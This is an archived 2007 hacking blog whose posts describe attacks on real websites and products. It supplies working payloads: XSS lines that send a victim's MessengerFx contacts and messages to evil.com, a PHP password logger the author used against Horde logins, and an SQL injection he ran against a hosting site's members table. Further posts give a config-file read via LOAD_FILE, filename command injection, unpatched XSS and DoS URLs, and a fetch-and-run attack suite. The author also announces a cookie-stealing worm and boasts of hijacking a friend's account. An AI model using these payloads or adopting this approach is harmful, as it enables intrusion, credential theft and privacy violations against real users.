fazed@darkstar.net #

Blog Moved..

2007-11-07T14:43:00.000Z

I am moving to a new domain using custom
made blog software, it will be set up soon
at the domain: fazed-darkstar.co.uk
I am also setting up a site at: darkstar.me.uk

Moodle Phishing

2007-11-07T14:34:00.000Z

Iframes really are evil..
at college we have a system called
moodle for handling all our assignments
and email etc. anyway they use iframes
who's content is set by a GET variable,
now if you read back a bit you will
see that this can lead to a phishing
attack as the user trusts the domain they
are on. this can also lead to XSS attacks
through the use of either the javascript:
protocol or the data: protocol (firefox)

Intelligent Retail XSS

2007-11-02T11:38:00.000Z

hmm just went looking over the intelligent
retail CMS again and found anouther XSS:
POC
Im not even going to bother looking any more
there must be so many holes in this system.

Firefox Data:

2007-11-02T10:58:00.000Z

Ok i know this is on GnuCitizen today
but it is actually very interesting. at the moment I am in
college but I liked the implications of this so much that
I am posting asap.
Anyways, Firefox uses the data: protocol to handle
data that is passed from the site to the browser,
you can then create your own data that will be
executed on the current site like so:
Proof Of Concept

you can do this widouth the base64 encoded text
and have it in plain text instead but that is easier
for people to see what you are doing.

heres a funny one to do to people:
Proof Of Concept

you could expand this much more.

Firefox/Opera Plugin Enumeration

2007-10-28T21:33:00.000Z

This simple Script will test a web browser
for different browser plugins.
this information can then be used to do
OS fingerprinting and/or to launch an attack
against the client.
The main problem is that this doesn't
accept varibles and so it has to
be repeted loads of times.
you can test this script:

<html><head><title>Plugin Enumeration</title></head>
<script>
function enum(){
xs = '';
try { xs += "<br>" + navigator.plugins[0].name; } catch(e) { xs += ""; }
try { xs += "<br>" + navigator.plugins[1].name; } catch(e) { xs += ""; }
try { xs += "<br>" + navigator.plugins[2].name; } catch(e) { xs += ""; }
try { xs += "<br>" + navigator.plugins[3].name; } catch(e) { xs += ""; }
try { xs += "<br>" + navigator.plugins[4].name; } catch(e) { xs += ""; }
try { xs += "<br>" + navigator.plugins[5].name; } catch(e) { xs += ""; }
try { xs += "<br>" + navigator.plugins[6].name; } catch(e) { xs += ""; }
try { xs += "<br>" + navigator.plugins[7].name; } catch(e) { xs += ""; }
try { xs += "<br>" + navigator.plugins[8].name; } catch(e) { xs += ""; }
try { xs += "<br>" + navigator.plugins[9].name; } catch(e) { xs += ""; }
try { xs += "<br>" + navigator.plugins[10].name; } catch(e) { xs += ""; }
try { xs += "<br>" + navigator.plugins[11].name; } catch(e) { xs += ""; }
try { xs += "<br>" + navigator.plugins[12].name; } catch(e) { xs += ""; }
try { xs += "<br>" + navigator.plugins[13].name; } catch(e) { xs += ""; }
try { xs += "<br>" + navigator.plugins[14].name; } catch(e) { xs += ""; }
try { xs += "<br>" + navigator.plugins[15].name; } catch(e) { xs += ""; }
try { xs += "<br>" + navigator.plugins[16].name; } catch(e) { xs += ""; }
try { xs += "<br>" + navigator.plugins[17].name; } catch(e) { xs += ""; }
try { xs += "<br>" + navigator.plugins[18].name; } catch(e) { xs += ""; }
try { xs += "<br>" + navigator.plugins[19].name; } catch(e) { xs += ""; }
try { xs += "<br>" + navigator.plugins[20].name; } catch(e) { xs += ""; }
try { xs += "<br>" + navigator.plugins[21].name; } catch(e) { xs += ""; }
try { xs += "<br>" + navigator.plugins[22].name; } catch(e) { xs += ""; }
try { xs += "<br>" + navigator.plugins[23].name; } catch(e) { xs += ""; }
try { xs += "<br>" + navigator.plugins[24].name; } catch(e) { xs += ""; }
try { xs += "<br>" + navigator.plugins[25].name; } catch(e) { xs += ""; }
try { xs += "<br>" + navigator.plugins[26].name; } catch(e) { xs += ""; }
try { xs += "<br>" + navigator.plugins[27].name; } catch(e) { xs += ""; }
try { xs += "<br>" + navigator.plugins[28].name; } catch(e) { xs += ""; }
try { xs += "<br>" + navigator.plugins[29].name; } catch(e) { xs += ""; }
try { xs += "<br>" + navigator.plugins[30].name; } catch(e) { xs += ""; }
try { xs += "<br>" + navigator.plugins[31].name; } catch(e) { xs += ""; }
try { xs += "<br>" + navigator.plugins[32].name; } catch(e) { xs += ""; }
try { xs += "<br>" + navigator.plugins[33].name; } catch(e) { xs += ""; }
try { xs += "<br>" + navigator.plugins[34].name; } catch(e) { xs += ""; }
try { xs += "<br>" + navigator.plugins[35].name; } catch(e) { xs += ""; }
try { xs += "<br>" + navigator.plugins[36].name; } catch(e) { xs += ""; }
try { xs += "<br>" + navigator.plugins[37].name; } catch(e) { xs += ""; }
try { xs += "<br>" + navigator.plugins[38].name; } catch(e) { xs += ""; }
try { xs += "<br>" + navigator.plugins[39].name; } catch(e) { xs += ""; }
try { xs += "<br>" + navigator.plugins[40].name; } catch(e) { xs += ""; }
document.write(xs);
}
</script>
<body>
<!-- Plugin Enumeration
Created By [fazed] --!>
<small>Plugin Emumeration<br>By [fazed]</small><div id='plugs'><a href="javascript: enum();"><button>Go</button></a></div>

Mobile Attack Suite v1r1

2007-10-27T02:59:00.000+01:00

I have just thrown together a few of
my tools I have created over the years
to end up with a toolkit that will run
from a windows mobile/CE device with an
internet connection.

First you will need pythonCE:
http://www.sourceforge.net/projects/pythonce

Install that to your mobile device and on your
computer create a .txt file called attackSuite.txt
the source for the Suite is
(please dont use this url to often as it uses up
our bandwidth.)

upload this file somewhere.
in python on the mobile device run
the following commands:

from urllib import *
sh = urlopen("http://host/attackSuite.txt")
fh = open("attacksuite.py", "w")
fh.write(sh.read())
fh.close()
sh.close()

now you can load the suite by typing:

from attacksuite import *

to get more help from within the application
type: helper()

CSRF Video.

2007-10-25T00:50:00.000+01:00

Have Switched to using
rapidshare due to poor quality
of youtube and hope this is a bit better..
just realised that the font I
used cut off the F in CSRF
at the title so it now says CSR..
oh well im a busy guy. I cant be bothered
to change that. anyway you can download
the video from rapidshare:

CSRF.

2007-10-21T22:26:00.000+01:00

After Reading A post on
InsaneSecurity
About CSRF I desided to see how
far this problem extends,
We All know the simple thinks such
as login people out of accounts..
(on blogger you give them the link:
http://www.blogger.com/logout.g) but
this isn't as far as it goes.
I desided to do some controled testing
to see how far I could push the use of
CSRF.
I will post a video of exploiting CSRF through
AJAX in my next post. As explained at the end
of the video you could use a POST request within
an XSS to execute more advanced CSRF attacks and
when Cross site requesting is added to the AJAX
specification you will be able to embed this within
your own site.

phishing with google

2007-10-10T16:05:00.000+01:00

If you want to send someone a link then it
is best to send them a url that they trust right?
I have just discovered (although it has probably been used
many times before) that you can use the google image
search to show a webpage of your choice, this means that
you could phish google passwords by creating a page that
says that the viewer needs to log into google to view the
image,
here is a PoC link to show you how it works:

PoC on google

Code for log.php

2007-10-09T02:17:00.000+01:00

I was asked for the code for
the log.php i used in the XSS on horde,
its a VERY simple logger that
reads any input.

<?php
$fh = fopen("log.txt", "a");
fwrite($fh, "\n--New Log--");
foreach($_POST as $i)
{
fwrite($fh,"\n".$i);
}
fclose($fh);
if(!header("Location: http://[whereever]"))
{
echo "<script>";
echo "document.location.href='http://[whereever]'";
echo "</script>";
}
?>

now you can post any varible to this and it
will save it(/them) and redirect to [whereever].
hope this helps..

Nuked City?

2007-10-09T02:00:00.000+01:00

I've just finished reading the
white paper on the Axis 2100 research,
I desided to do a google search for these
camera's and i found the AXIS 221 network camera,
it lets you set the image in a GET variable..

here's what I mean:
PoC

Horde v3.0.10 Password Logging

2007-10-07T20:28:00.000+01:00

The Login system on horde v3.0.10 (maybe more I haven't tested)
has an XSS that allows you to log the passwords entered by the
users, who's going to suspect somethings wrong if its their site
in the url and its showing them a familier login screen?

PoC

Response 300

2007-10-07T18:39:00.000+01:00

Why? just why did the people who came up
with response codes include 300?
if you ever come across a server that actually
allows this response then take advantage of it,
for example if your looking for a file but don't
know what extension the developer may have used
then you could do something like this (say you were
looking for sql.obfuscated but didn't know its extention)
you could visit:
http://example.com/sql.
and it would give you a list of all files that start with sql,
so it would show you sql.obfuscated, people turn this off!

Phishing Windows Passwords with Citrix

2007-10-06T01:09:00.001+01:00

Ok this is only in theory at the moment
but if you have ever set up the citrix presentation
server client then you will see that they include an
option to log into citrix servers using the current
windows users username and password, now think about
it. send the users password to a server?
couldn't an attacker just set up a fake server and
get people to attempt to login and store their password
somewhere? anouther example of just how bad GUI security
can be..

Intelligent Retail DoS

2007-09-29T18:15:00.001+01:00

I don't usually post about DoS's or
any PoC's or 0-days (which this is)
but I know a business that uses this
software for their website.
this DoS needs to be run on serveral computers
(so it is more of a DDoS)
the DoS is in software created by Intelligent Retail
who also offer cash registers for businesses.
Anyway I took a quick look through a site
for a friend, at first I thought "oh they use
jsp there wont be many vulnerabilities" but then
I found a local file inclusion which also works
as a DoS tool in the file:

host.jsp?pg=host.jsp

there is also an xss in this page:

host.jsp?pg=aboutus.html
&desc='%3E%3Cscript%3Ealert('xss')%3C/script%3E

there are probably many other error's in this code
these are just a few I came accross.

google XSS fixed

2007-09-27T01:07:00.000+01:00

the latest google xss seems to have been
fixed, this xss could have caused so much
damage during the time from discovery to
being fixed. for example this exploit was
on the mi5 (british seacret intelligence)
website, some "leet" hacker could have stolen
their admins cookies and taken down the uk,
yeah right.
but still this vulnerability effected so many
sites and could have ment that script kiddies
could have had easy pickings, from now on I
think vulnerability's like this should have
a more secret disclosure (I will probably end up
going back on this later)

Javascript Worm

2007-09-26T23:42:00.000+01:00

I will be spending some time
during the comming months working
on a javascript worm which
will use common vulnerabilities
to get its way into a victims system
and stay there, learning more vulnerabilities
and using AJAX to make calls behind the victims
browser to send their cookies and so on,
this could take some time to write so
don't expect it soon.

Online Shameing

2007-09-26T23:36:00.000+01:00

Well today I have actually realised
how much the internet means to people
and their social lives these days,
for example at one point one of
my friends spread stuff about me
and made my girlfriend at the time
annoyed with me, I wanted to get
back at him some how without him
knowing it was me, so what did i do?
I concocted a simple social engineering
page for the (second most) popular social
network in the uk, bebo. I then told
my mate to say "omg look at what [name blanked]
has written on his bebo" and the stupid guy
actually fell for it.

anyway I changed his bebo abit and he was really
angry because everyone was laughing at him,
this just shows to me that people are depending
on the internet for their social life too much.

(wow that post was a tad of topic)

"1337" web browsers

2007-09-26T23:33:00.000+01:00

well 7 year old kids have taken to
the forms as proven by the recent posts
on the popular place for noobies to
hang out http://4chan.org

Don't worry this isn't my only post tonight
I just wanted to mention it,
and shame some noob called sage!

XSS in megaclick

2007-09-20T16:12:00.000+01:00

I downloaded the megaupload toolbar
the other day because I thought it would
make uploading things much quicker.
but I've started noticing that every time
I get an error code I get taken to megaclick
to view it instead, I started to get VERY annoyed
with this so i looked closer, and guess what..
an XSS!
the below is ONE url
put it together and see what you get:

http://www.megaclick.com/404/?lg=en&type=44&q=
http://www.google.co.uk/erwef%3Cscript%3Ealert
(String.fromCharCode(120%20,115%20,115%20))%3C/script%3E

[VID] Remote Code Injection

2007-09-20T01:25:00.001+01:00

Videos

2007-09-19T23:51:00.000+01:00

I am creating a series of videos
to go in my pen-testing tutorial collection
that I am writing, I will attempt to
create a video for each type of common
attack at the moment as well as a few
other tricks, You will be able to view these
video's for free (at the moment) at:
http://megavideo.com/?c=profile_videos&user=fazed666

although I will be posting some on here from
time to time.

OWP IDS

2007-09-19T23:44:00.000+01:00

I am currently working on a project for
a client, this is just a simple business
web portal but as we are marketing it we
want something that will make it stand out
and instead of just making sure my script's
were secure and pen-testing an example site
after I created it I have created a whole
IDS written in php, this IDS can be updated
with new rules as much as the user wants and
will check all GET and POST request for anything
malicious and log the input to file, this will
make it easier for an admin to see if there have
been any attempted break in's or to see the entry
point if there were any real break in's,

the source code for this IDS will be realeased after
release 2.0 of the web portal as it is commercial software
that I am selling at the moment,
If you cant wait you can contact me at:
team [at] net [dash] aware [dot] co [dot] uk
and I will sell it to anyone for a discount price.

My ChickenFoot Javascript Scanner

2007-09-12T01:28:00.000+01:00

I have been working on a chickenfoot/javascript app
which will scan the website you are on for
vulnerabilities, at the moment it is very basic
but I am planning to add a spider that will
find all the pages on the current site and
test each one. chickenfoot allowes for local
storage so this is possible.
I will keep you posted on it.

XSS's still not being taken seriously..

2007-07-05T11:39:00.000+01:00

"Enhanced XSS Protection

Substantial backend changes have been made
to further protect cPanel and WHM users from cross-site
scripting. Many behind the scenes functions have
been added to render such nuisances
harmless." - Cpanel's website about Cpanel 11

As I was looking to see what the default cpanel database/table/column names
were and it shows that people STILL haven't really realized
the impact XSS's can have on a website both to the
site and to its owner, as soon as I find a site running
Cpanel 11 I am determined to bypass this protection..

Free Hosting?

2007-07-04T03:40:00.000+01:00

While trying to get "Free hosting"
I came across a host with an SQL injection
on their site, I started trying to inject it
and it wasn't long before I found the table "members"
from here I got the columns:
[x]Email
[x]Address
[x]Phone

but could not find the username or password column
(List of what I tried is too long for here..)
so I started trying out new ways of finding out as
much about the table I was in as I could,
well all I could do is try and brute force
or guess the column names, so this didn't really
mount to much but I ended up with the attack vector:

null UNION ALL SELECT 1,email FROM members WHERE
SUBSTRING(email,14)=CONCAT(CHAR(115), CHAR(116))/*

which ment I could get emails out of the database (as the statement was
somehow limited to 1 output (*probably in php*))
I'll post if I get any further..

Nice SQL attack Vector

2007-07-01T01:11:00.000+01:00

I saw this attack vector while on 0x000000

SELECT SUBSTRING(LOAD_FILE('/var/www/html/config.php'),20,24) = 'root';

Its quite interesting way of getting the
sites db connection details, but you do need to
know their *nix path to the config file.
I was trying to think of ways to find this,
but the best way to find out is to get a php error
page as it will usually have the path,
failing this the users name is usually the first
8 letters of their website (if set up automatically)

In IIS 6 you can read from:
%systemroot%\system32\inetsrv\MetaBase.xml

I guess you could read from the locate database in
*nix but this can sometimes be chowned by root.

Code Execution Through Filenames

2007-06-29T23:24:00.000+01:00

I saw an article on rsnakes blog ( ha.ckers.org )
about executing code on picture uploads through
malformed image names.
for instance you could call a file

|ls

then it would execute the command ls
if the script was written in perl
but this wouldn't bypass file name
validation,
so I decided to mod the names and try
it differently. I names the file
with a .jpg file extension like this:

|ls>out#.jpg

this can be achieved on a *nix system with nano
installed like this:

fazed@darkstar # nano \|ls\>out#.jpg

if the content of this file was also an image then
it would bypass most php upload validation and you could then
use a vulnerable perl file to open in and it will echo the
output of the command to the file: out#.jpg
I'm sure someone could find a more practical use
for this.

Cross DOM Communication

2007-06-29T21:59:00.001+01:00

In the new HTML 5 Cross DOM support is planned,
This will allow websites with a different source domain
from the target one to talk to each other,
Ill let you see the huge risk for XSS attacks here.

here is a link to the Documentation

Web2.0 Exposing your MSN?

2007-06-28T03:49:00.000+01:00

I recently visited the site: http://MessengerFx.com
decided I would look at their security,
what I found is actually quite disturbing,
I started to look around for XSS's I started
by looking in the most obscure places but then
I thought I should try the most obvious so
in a conversation with someone I typed

<script>alert('xss')</script>

and it actually worked!
well with it working on my side I created a new
account and signed in on the site with it and
went on my normal msn to talk to it.
from here I started to look at the DOM
as I knew that as the site was Ajax based
to make it Asynchronous I knew that everything
would be controlled by javascript which I could now
call with the xss, here are a few examples
(some need to be ASCII encoded to work)

-- -- read there online contact list -- --
<script>document.location.href = "http://evil.com/captcha.php?x=" + document.getElementById('divOnline').innerHTML</script>

-- -- Change there display name -- --
<script>mfx.setOwnerName('[d/n goes here]')</script>

-- -- Read messages from (and to) a contact -- --
<script>document.location.href="
http://evil.com/captcha.php?x=" +
document.getElementById('u_[firstpartofmsn]hotmail
_d_co_d_ukcDivHistoryBar').innerHTML</script>

I have many more things you can do but they are
all going into an XSS worm I'm building.

Eblogger Exploits

2007-06-28T03:23:00.000+01:00

Well while trying out other blogs
I came across eblogger.com,
I signed up to it and started to look around
because I like to know if what I'm
using is secure, the first thing I saw was an XSS in
the calender they have here is the PoC link:
http://eblogger.com/bluepysc.asp?u=fazed&action=daypost&tday=6/27/2007%3Cscript%3Ealert('xss')%3C/script%3E
this kinda got me going and I started to look around a bit
more, 2 minutes later I came across an SQL injection:
http://www.eblogger.com/blog.asp?u='[sql]--'&action=photo
after this I just gave up and decided to stick with blogger.com.

I am not responsible for the (mis) use of anything mentioned
on this site.

Welcome

2007-06-28T03:20:00.000+01:00

Welcome wanderer,
you have just come across my little blog.
Here You will find many secreats of
the IT Security world